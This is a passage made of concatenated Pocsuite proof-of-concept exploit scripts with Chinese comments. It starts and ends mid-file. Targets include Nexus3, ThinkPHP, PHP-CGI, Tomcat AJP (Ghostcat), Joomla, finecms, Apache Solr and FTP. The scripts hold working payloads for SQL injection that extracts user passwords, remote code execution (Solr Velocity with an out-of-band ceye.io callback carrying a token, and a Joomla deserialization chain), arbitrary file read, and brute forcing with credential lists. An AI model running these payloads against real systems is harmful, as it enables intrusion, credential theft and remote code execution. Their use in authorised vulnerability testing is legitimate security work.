            except json.decoder.JSONDecodeError as e:
                if resp.status_code == 401:
                    pass
                    #print("认证失败")
                else:
                    print("json解析失败")
                # 失败了可能只是密码错误，继续下一个密码尝试
            except Exception:
                print(e)
                raise e



    def get_auth_headers(self):
        #user = "admin"
        users = ['nexus', 'test', 'root', 'nexus3', 'admin', 'user', 'administrator']
        #passwords = ["admin", "admin123"]    # 可以在此添加多个密码
        passwords = self.get_password_dict()

        _l_auth_headers = []
        for user in users:
            for password in passwords:
                tmp = user + ':' + password
                auth = base64.b64encode(tmp.encode('ascii')).decode("utf-8")
                headers = {'Authorization': 'Basic'+' '+auth}
                _l_auth_headers.append(headers)
        
        return _l_auth_headers


    def get_password_dict(self):
        f = open(paths.WEAK_PASS)
        pwddict = []
        for item in f.readlines():
            pwddict.append(item.strip())
        return pwddict


    # 验证EL表达式被执行
    def test_EL(self, p_resp):
        d = p_resp.json()
        result = d['result']['errors']['roles']
        print(result)
        print(self.ran_sum)
        try:
            if str(self.ran_sum) in result:
                return True
        except Exception:
            return False            


    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register_poc(Nexus3_2018_16621_EL_INJECTION_POC)



from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.api import OptString
from pocsuite3.lib.utils import random_str
from collections import OrderedDict
import requests
from urllib.parse import urlparse
from urllib.parse import parse_qs


class DemoPOC(POCBase):
	
	vulID = '1'
	version = '1'
	name = "Thinkphp include demo"
	appName = 'Thinkphp'
	appVersion = '5.x'
	desc = "本次漏洞存在于 ThinkPHP 模板引擎中，在加载模版解析变量时存在变量覆盖问题，而且程序没有对数据进行很好的过滤，最终导致 文件包含漏洞 的产生。漏洞影响版本： 5.0.0<=ThinkPHP5<=5.0.18 、5.1.0<=ThinkPHP<=5.1.10."


	def _verify(self):

			result = {}
			kkk = urlparse(self.url)
			query_dict = parse_qs(kkk.query)
			payload = 'cacheFile=../README.md'

			if query_dict:
				url = self.url+'&'+payload
			else:
		  		url = self.url+'?'+payload	
			try:
				request = requests.get(url)
				if request.text:
					if 'ThinkPHP' in request.text:
							result['VerifyInfo'] = {}
							result['VerifyInfo']['url'] = url
							result['VerifyInfo']['payload'] = payload 
			except Exception as e:
						pass	
			
			return self.parse_output(result)


	def parse_output(self,result):
		 	
			output = Output(self)
			if result:
			 	output.success(result)
		
			else:
				output.fail('target is not vulnerable')
		
			return output
		 
	def _attack(self):
		return self._verify()


register_poc(DemoPOC)



#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import time
import random
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register



class TestPOC(POCBase):
    name = 'php_cgl_code_execution'
    vulID = '0'
    author = ['LRestless']
    vulType = '	code-exec'
    version = '1'
    references = ['https://vulhub.org/#/environments/php/CVE-2012-1823/']
    desc = u'''在PHP中使用基于cgi的设置(如Apache的mod_cgid),在某些配置可以执行任意代码与Web服务器的权限'''

    vulDate = '2012'
    createDate = '2019-03-22'
    updateDate = '2019-03-22'

    appName = 'PHP CGL'
    appVersion = '<5.3.12'
    appPowerLink = 'http://www.php.net/'
    samples = ['']

    def _attack(self):
        """attack mode"""
        return self._verify()
        pass

    def _verify(self):
        """verify  mode"""
        result = {}
        header = {
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
            'Connection': 'close',
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        payload = '/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input'
        flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
        data = '<?php echo "' + flag + '"; ?>'
        self.url = self.url.strip('/') + payload
        resp = req.post(self.url, headers=header, data=data)
        time.sleep(2)
        if flag in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
# CNVD-2020-10487/CVE-2020-1938
# Tomcat-Ajp lfi
# https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
# by ydhcui

import io
import socket
import struct
import base64
from urllib.parse import urlparse
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


# Some references:
# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
def pack_string(s):
    if s is None:
        return struct.pack(">h", -1)
    l = len(s)
    return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)


def unpack(stream, fmt):
    size = struct.calcsize(fmt)
    buf = stream.read(size)
    return struct.unpack(fmt, buf)


def unpack_string(stream):
    size, = unpack(stream, ">h")
    if size == -1:  # null string
        return None
    res, = unpack(stream, "%ds" % size)
    stream.read(1)  # \0
    return res


class NotFoundException(Exception):
    pass


class AjpBodyRequest(object):
    # server == web server, container == servlet
    SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
    MAX_REQUEST_LENGTH = 8186

    def __init__(self, data_stream, data_len, data_direction=None):
        self.data_stream = data_stream
        self.data_len = data_len
        self.data_direction = data_direction

    def serialize(self):
        data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
        if len(data) == 0:
            return struct.pack(">bbH", 0x12, 0x34, 0x00)
        else:
            res = struct.pack(">H", len(data))
            res += data
        if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
            header = struct.pack(">bbH", 0x12, 0x34, len(res))
        else:
            header = struct.pack(">bbH", 0x41, 0x42, len(res))
        return header + res

    def send_and_receive(self, socket, stream):
        while True:
            data = self.serialize()
            socket.send(data)
            r = AjpResponse.receive(stream)
            while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
                r = AjpResponse.receive(stream)

            if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
                break


class AjpForwardRequest(object):
    _, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(
        28)
    REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE,
                       'TRACE': TRACE}
    # server == web server, container == servlet
    SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
    COMMON_HEADERS = ["SC_REQ_ACCEPT",
                      "SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE",
                      "SC_REQ_AUTHORIZATION",
                      "SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE",
                      "SC_REQ_COOKIE2",
                      "SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT"
                      ]
    ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert",
                  "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"]

    def __init__(self, data_direction=None):
        self.prefix_code = 0x02
        self.method = None
        self.protocol = None
        self.req_uri = None
        self.remote_addr = None
        self.remote_host = None
        self.server_name = None
        self.server_port = None
        self.is_ssl = None
        self.num_headers = None
        self.request_headers = None
        self.attributes = None
        self.data_direction = data_direction

    def pack_headers(self):
        self.num_headers = len(self.request_headers)
        res = ""
        res = struct.pack(">h", self.num_headers)
        for h_name in self.request_headers:
            if h_name.startswith("SC_REQ"):
                code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
                res += struct.pack("BB", 0xA0, code)
            else:
                res += pack_string(h_name)

            res += pack_string(self.request_headers[h_name])
        return res

    def pack_attributes(self):
        res = b""
        for attr in self.attributes:
            a_name = attr['name']
            code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
            res += struct.pack("b", code)
            if a_name == "req_attribute":
                aa_name, a_value = attr['value']
                res += pack_string(aa_name)
                res += pack_string(a_value)
            else:
                res += pack_string(attr['value'])
        res += struct.pack("B", 0xFF)
        return res

    def serialize(self):
        res = ""
        res = struct.pack("bb", self.prefix_code, self.method)
        res += pack_string(self.protocol)
        res += pack_string(self.req_uri)
        res += pack_string(self.remote_addr)
        res += pack_string(self.remote_host)
        res += pack_string(self.server_name)
        res += struct.pack(">h", self.server_port)
        res += struct.pack("?", self.is_ssl)
        res += self.pack_headers()
        res += self.pack_attributes()
        if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
            header = struct.pack(">bbh", 0x12, 0x34, len(res))
        else:
            header = struct.pack(">bbh", 0x41, 0x42, len(res))
        return header + res

    def parse(self, raw_packet):
        stream = io.StringIO(raw_packet)
        self.magic1, self.magic2, data_len = unpack(stream, "bbH")
        self.prefix_code, self.method = unpack(stream, "bb")
        self.protocol = unpack_string(stream)
        self.req_uri = unpack_string(stream)
        self.remote_addr = unpack_string(stream)
        self.remote_host = unpack_string(stream)
        self.server_name = unpack_string(stream)
        self.server_port = unpack(stream, ">h")
        self.is_ssl = unpack(stream, "?")
        self.num_headers, = unpack(stream, ">H")
        self.request_headers = {}
        for i in range(self.num_headers):
            code, = unpack(stream, ">H")
            if code > 0xA000:
                h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
            else:
                h_name = unpack(stream, "%ds" % code)
                stream.read(1)  # \0
            h_value = unpack_string(stream)
            self.request_headers[h_name] = h_value

    def send_and_receive(self, socket, stream, save_cookies=False):
        res = []
        i = socket.sendall(self.serialize())
        if self.method == AjpForwardRequest.POST:
            return res

        r = AjpResponse.receive(stream)
        assert r.prefix_code == AjpResponse.SEND_HEADERS
        res.append(r)
        if save_cookies and 'Set-Cookie' in r.response_headers:
            self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']

        # read body chunks and end response packets
        while True:
            r = AjpResponse.receive(stream)
            res.append(r)
            if r.prefix_code == AjpResponse.END_RESPONSE:
                break
            elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
                continue
            else:
                raise NotImplementedError
                break

        return res


class AjpResponse(object):
    _, _, _, SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
    COMMON_SEND_HEADERS = [
        "Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified",
        "Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate"
    ]

    def parse(self, stream):
        # read headers
        self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")

        if self.prefix_code == AjpResponse.SEND_HEADERS:
            self.parse_send_headers(stream)
        elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
            self.parse_send_body_chunk(stream)
        elif self.prefix_code == AjpResponse.END_RESPONSE:
            self.parse_end_response(stream)
        elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
            self.parse_get_body_chunk(stream)
        else:
            raise NotImplementedError

    def parse_send_headers(self, stream):
        self.http_status_code, = unpack(stream, ">H")
        self.http_status_msg = unpack_string(stream)
        self.num_headers, = unpack(stream, ">H")
        self.response_headers = {}
        for i in range(self.num_headers):
            code, = unpack(stream, ">H")
            if code <= 0xA000:  # custom header
                h_name, = unpack(stream, "%ds" % code)
                stream.read(1)  # \0
                h_value = unpack_string(stream)
            else:
                h_name = AjpResponse.COMMON_SEND_HEADERS[code - 0xA001]
                h_value = unpack_string(stream)
            self.response_headers[h_name] = h_value

    def parse_send_body_chunk(self, stream):
        self.data_length, = unpack(stream, ">H")
        self.data = stream.read(self.data_length + 1)

    def parse_end_response(self, stream):
        self.reuse, = unpack(stream, "b")

    def parse_get_body_chunk(self, stream):
        rlen, = unpack(stream, ">H")
        return rlen

    @staticmethod
    def receive(stream):
        r = AjpResponse()
        r.parse(stream)
        return r

def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
    fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
    fr.method = method
    fr.protocol = "HTTP/1.1"
    fr.req_uri = req_uri
    fr.remote_addr = target_host
    fr.remote_host = None
    fr.server_name = target_host
    fr.server_port = 80
    fr.request_headers = {
        'SC_REQ_ACCEPT': 'text/html',
        'SC_REQ_CONNECTION': 'keep-alive',
        'SC_REQ_CONTENT_LENGTH': '0',
        'SC_REQ_HOST': target_host,
        'SC_REQ_USER_AGENT': 'Mozilla',
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Accept-Language': 'en-US,en;q=0.5',
        'Upgrade-Insecure-Requests': '1',
        'Cache-Control': 'max-age=0'
    }
    fr.is_ssl = False
    fr.attributes = []
    return fr


class Tomcat(object):
    def __init__(self, target_host, target_port, timeout = 5):
        self.target_host = target_host
        self.target_port = target_port

        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.settimeout(timeout)
        try:
            self.socket.connect((target_host, target_port))
            self.stream = self.socket.makefile("rb", buffering=0)
        except socket.timeout:
            self.socket.close()
            #print('[-] {}:{} => timeout'.format(self.target_host, self.target_port))

    def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
        self.req_uri = req_uri
        self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri,
                                                           method=AjpForwardRequest.REQUEST_METHODS.get(method))
        #print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
        if user is not None and password is not None:
            self.forward_request.request_headers[
                'SC_REQ_AUTHORIZATION'] = f'Basic {base64.b64encode(f"{user}:{password}".encode()).decode()}'
        for h in headers:
            self.forward_request.request_headers[h] = headers[h]
        for a in attributes:
            self.forward_request.attributes.append(a)
        try:
            responses = self.forward_request.send_and_receive(self.socket, self.stream)
            if len(responses) == 0:
                return None, None
            snd_hdrs_res = responses[0]
            data_res = responses[1:-1]
            if len(data_res) == 0:
                pass
                #print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
            return snd_hdrs_res, data_res
        except:
            return None,None

class TestPOC(POCBase):
    vulID = ''
    version = '1'
    author = 'rootk1t'
    vulDate = '2020-02-20'
    createDate = '2020-07-15'
    updateDate = '2020-07-15'
    references = [
        'https://www.chaitin.cn/zh/ghostcat']
    name = 'Tomcat Ajp 任意文件读取、包含漏洞'
    appPowerLink = 'https://tomcat.apache.org/'
    appName = 'Apache Tomcat'
    appVersion = '9.x<9.0.31,8.x<8.5.51,7.x<7.0.100,6.x'
    vulType = VUL_TYPE.ARBITRARY_FILE_READ
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
            Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器，按照Sun Microsystems提供的技术规范，实现了对Servlet和JavaServer Page（JSP）的支持。由于Tomcat本身也内含了HTTP服务器，因此也可以视作单独的Web服务器。
            CNVD-2020-10487/CVE-2020-1938是文件包含漏洞，攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件，如：webapp 配置文件、源代码等。
            影响版本：
            Apache Tomcat 9.x < 9.0.31
            Apache Tomcat 8.x < 8.5.51
            Apache Tomcat 7.x < 7.0.100
            Apache Tomcat 6.x
    '''
    samples = ['127.0.0.1:8009']

    def _verify(self):
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [8009]
        s = socket.socket()
        
        for port in ports:
            try:
                t = Tomcat(pr.hostname, port)
                _, data = t.perform_request(f'/hissec{".jsp" if False else ""}', attributes=[
                    {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
                    {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', 'WEB-INF/web.xml']},
                    {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
                ])
                if data :
                    res_txt = ''.join([d.data.decode('utf_8') for d in data])
                    if 'web-app' in res_txt:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
                        result['extra'] = {}
                        result['extra']['evidence'] = res_txt
                        break
            except:
                #raise
                pass
            finally:
                s.close()
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("not vulnerability")
        return output

register_poc(TestPOC)




#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '67141'  # ssvid
    version = '1.0'
    author = ['hhxx']
    vulDate = '2009-12-08'
    createDate = '2016-01-14'
    updateDate = '2016-01-14'
    references = ['http://www.sebug.net/vuldb/ssvid-67141']
    name = 'Joomla Component com_job (showMoreUse) SQL injection vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla Component com_job'
    appVersion = 'N/A'
    vulType = 'SQL injection'
    desc = u'''
        Joomla! Component com_job 组件'index.php' SQL注入漏洞
        Joomla! Component com_job 组件的index.php中存在SQL注入漏洞。
        远程攻击者可以借助一个option操作中的id参数，执行任意SQL指令。
    '''
    samples = ['']

    def _attack(self):
        result = {}
        payload = '/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,%s,17,18,19,20,21,22,23,24,25+from+kew_users--'
        payload = payload % 'concat(0x757365723d,username,0x3a,0x70617373776f72643d,password,0x3a)'
        vul_url = '%s%s' % (self.url,payload)
        res = req.get(vul_url,timeout = 10)
        Username = re.search("(user=(?P<username>.*?):)",res.content) 
        Password = re.search("(password=(?P<password>.*?):)",res.content) 
        if Username and Password: 
            result['Database'] = {}
            result['Database']['Username'] = Username.group("username")
            result['Database']['Password'] = Password.group("password")
        return self.parse_output(result)

    def _verify(self):
        result = {}
        payload = '/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,%s,17,18,19,20,21,22,23,24,25+from+kew_users--'
        payload = payload % 'md5(1)'
        vul_url = '%s%s' % (self.url,payload)
        res = req.get(vul_url,timeout = 10)
        if 'c4ca4238a0b923820dcc509a6f75849b' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)


#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

#requests 
from pocsuite.api.request import req
#register
from pocsuite.api.poc import register
#report
from pocsuite.api.poc import Output, POCBase
#url转换host
from pocsuite.lib.utils.funs import url2ip

#基础基类
class FtpPOC(POCBase):
    vulID = '33'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2018-05-22' #漏洞公开的时间,不知道就写今天

    author = 'xiaohuihui1' #  PoC作者的大名
    createDate = '2018-05-22'# 编写 PoC 的日期
    updateDate = '2018-05-22'# PoC 更新的时间,默认和编写时间一样
    references = "http://www.freebuf.com/articles/web/6088.html"# 漏洞地址来源,0day不用写
    name = 'ftp Unauthorized access'# PoC 名称
    appPowerLink = ''# 漏洞厂商主页地址
    appName = 'ftp'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'Weak-Password'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        ftp 存在弱口令
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重" #严重,高危,中危,低危

    #指纹方法
    def _fingerprint(self):
        pass

    def _verify(self):
        result={}
        vul_url = '%s' % self.url
        import re
        import time
        import ftplib
        from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = int(url2ip(vul_url)[1])
        else :
            _host = url2ip(vul_url)
            _port = 21

        #判断端口是否开放   
        import socket
        sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sk.settimeout(1)
        try:
            sk.connect((_host,_port))
            #print 'Server port is OK!'
        except Exception:
                return self.save_output(result)
        sk.close()


        flag = False
        payload = "弱口令"
        # username = ["www","db","wwwroot","data","web","ftp","anonymous","admin","Admin","Administrator","administrator","root","ADMIN"]
        username = ['anonymous',]
        password = ["","toor","1234","123456","admin","Admin","ADMIN","admin123","Admin123","root","root123","123.com"'123456','admin','root','password','123123','123','1','',
            'P@ssw0rd!!','qwa123','12345678','test','123qwe!@#',
          '123456789','123321','1314520','666666','woaini','fuckyou','000000',
          '1234567890','8888888','qwerty','1qaz2wsx','abc123','abc123456',
          '1q2w3e4r','123qwe','159357','p@ssw0rd','p@55w0rd','password!',
          'p@ssw0rd!','password1','r00t','system','111111','admin']
        for u in username:
            for p in password:
                socket.setdefaulttimeout(1)
                ftp = ftplib.FTP()
                try:
                    ftp.connect(_host,_port)
                    ftp.login(u,p)
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = _host
                    result['VerifyInfo']['Payload'] = u+p
                    return self.save_output(result)
                except Exception as e:
                    ftp.close()
                    continue
        print('[+]33 poc done')
        return self.save_output(result)
    #攻击模块
    def _attack(self):
        result = {}
        return self._verify()


    #输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


#注册类
register(FtpPOC)




#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
import json
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = 'finecms5.0.6 sql injection Vulnerability'
    vulID = '0'
    author = ['cws6']
    vulType = 'sql-inj'
    version = '1'
    references = ['https://blog.csdn.net/xiaoi123/article/details/84304568']
    desc = '''finecms5.0.6 /finecms/dayrui/controllers/Api.php的data2()的sql模块存在sql注入'''

    vulDate = '2018-05-21'
    createDate = '2019-04-25'
    updateDate = '2019-04-25'

    appName = 'finecms'
    appVersion = '5.0.6'
    appPowerLink = 'http://www.finecms.net/'
    samples = ['re']

    
    def _attack(self):
        """attack mode"""
        result = {}
        payload1 = '/index.php'
        payload2 = '?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=action=sql%20sql=%27select%20database();%27'
        resp = req.get(self.url + payload1  + payload2)
        dbname1 = re.findall('"(.*?)"', resp.content)
        if dbname1:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['Database'] = {}
            result['Database']['DBname'] = dbname1[7]
        return self.parse_output(result)

    def _verify(self):
        """verify mode"""
        result = {}
        payload1 = '/index.php'
        payload2 = '?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=action=sql%20sql=%27select%20version();%27'
        resp = req.get(self.url + payload1  + payload2)
        time.sleep(2)
        if resp:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
#_*_ encoding: utf-8 _*_

from pocsuite3.api import POCBase
from pocsuite3.api import Output
from pocsuite3.api import register_poc
from pocsuite3.api import requests
from pocsuite3.api import logger
from pocsuite3.api import OptString
from collections import OrderedDict
from pocsuite3.lib.utils import random_str
import json

class ApacheSolr(POCBase):
    vulID = '98097'
    version = '1.0'
    author = ['big04dream']
    vulDate = '2019-10-31'
    createDate = '2019-11-05'
    updateDate = '2019-11-05'
    references = ['https://www.seebug.org/vuldb/ssvid-98097']
    name = 'Apache Solr Remote Code Execution'
    appPowerLink = 'http://lucene.apache.org/solr/'
    appName = 'Apache Solr'
    appVersion = 'Solr <= 8.2.0'
    vulType = 'rce'
    desc = '''
    Apache solr模板注入漏洞
    '''

    def _options(self):
        o = OrderedDict()
        o['cmd'] = OptString('', description='这个poc需要输入命令', require=False)
        return o

    def _get_core_name(self, url):
        url += "/solr/admin/cores?wt=json&indexInfo=false"
        conn = requests.get(url=url)
        name = "big04dream"
        try:
            name = list(json.loads(conn.text)["status"])[0]
        except:
            pass
        return name

    def _update_config(self, url, name):
        url += "/solr/" + name + "/config"
        headers = {"Content-Type": "application/json"}
        post_data = """
        {
          "update-queryresponsewriter": {
            "startup": "lazy",
            "name": "velocity",
            "class": "solr.VelocityResponseWriter",
            "template.base.dir": "",
            "solr.resource.loader.enabled": "true",
            "params.resource.loader.enabled": "true"
          }
        }
        """
        conn = requests.request("POST", url, data=post_data, headers=headers)
        if conn.status_code != 200:
            logger.info('update config error')
            return False
        return True

    def _verify(self):
        result = {}
        p = 'ping '
        cmd = random_str(16) + '.6eb4yw.ceye.io'
        payload = p + cmd
        try:
            core_name = self._get_core_name(self.url)
            if self._update_config(self.url, core_name):
                url = self.url + "/solr/" + core_name + "/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27" + payload + "%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
                response = requests.get(url=url)
                logger.info(response.text)
                res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
                if cmd in res:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = url
                    result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(ApacheSolr)


#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

class TestPOC(POCBase):
    vulID = '00003'
    version = '1'
    author = 'jeffzhang'
    vulDate = '2017-08-26'
    createDate = '2017-08-26'
    updateDate = '2017-08-26'
    references = ['http://cxsecurity.com/cveshow/CVE-2015-8562/']
    name = 'Joomla 反序列化漏洞 PoC'
    appPowerLink = 'https://www.joomla.org'
    appName = 'Joomla'
    appVersion = '3.4.5'
    vulType = 'RCE'
    desc = '''
    	漏洞存在于反序列化session的过程中
    '''
    samples = ['']
    
    def _verify(self):
        result = {}
        payload = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'
        headers = {'User-Agent': payload}
        response = req.get(self.url, headers=headers, timeout=1)
        #response2 = req.get(self.url)
        if 'SERVER["REMOTE_ADDR"]' in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)
    def _attack(self):
        return self._verify()
    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet noting return')
        return output
register(TestPOC)


#!/usr/bin/env python
# -*- coding:utf-8 -*-
import re
from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register


class Angelo_emlak_Database_Found(POCBase):
    vulID = '67229'
    version = '1'
    vulDate = '2010-04-27'
    author = 'anonymous'
    createDate = '2015-11-15'
    updateDate = '2015-11-15'
    references = ['http://www.sebug.net/vuldb/ssvid-67229']
    name = 'Angelo-emlak 1.0 - Database Disclosure Vulnerability'
    appPowerLink = ''
    appName = 'Angelo-emlak'
    appVersion = ' '
    vulType = 'Database Found'
    desc = 'Angelo-Emlak在web根目录下保存敏感信息，但缺乏足够的访问控制，远程攻击者可以通过直接向veribaze/angelo.mdb发出请求，下载数据库。'
    samples = ['http://burdurdaemlak.com']


    def _attack(self):
        return self._verify()


    def _verify(self):
        result = {}
        vul_url = '%s/veribaze/angelo.mdb' % self.url
        response = req.get(vul_url).content

        if re.search('Standard Jet DB', response):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output

register(Angelo_emlak_Database_Found)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from pocsuite.api.utils import randomStr
from urlparse import urlparse, urljoin


class TestPOC(POCBase):
    vulID = 'N/A'
    version = '1.0'
    author = 'co0ontty'
    vulDate = '2018-10-16'
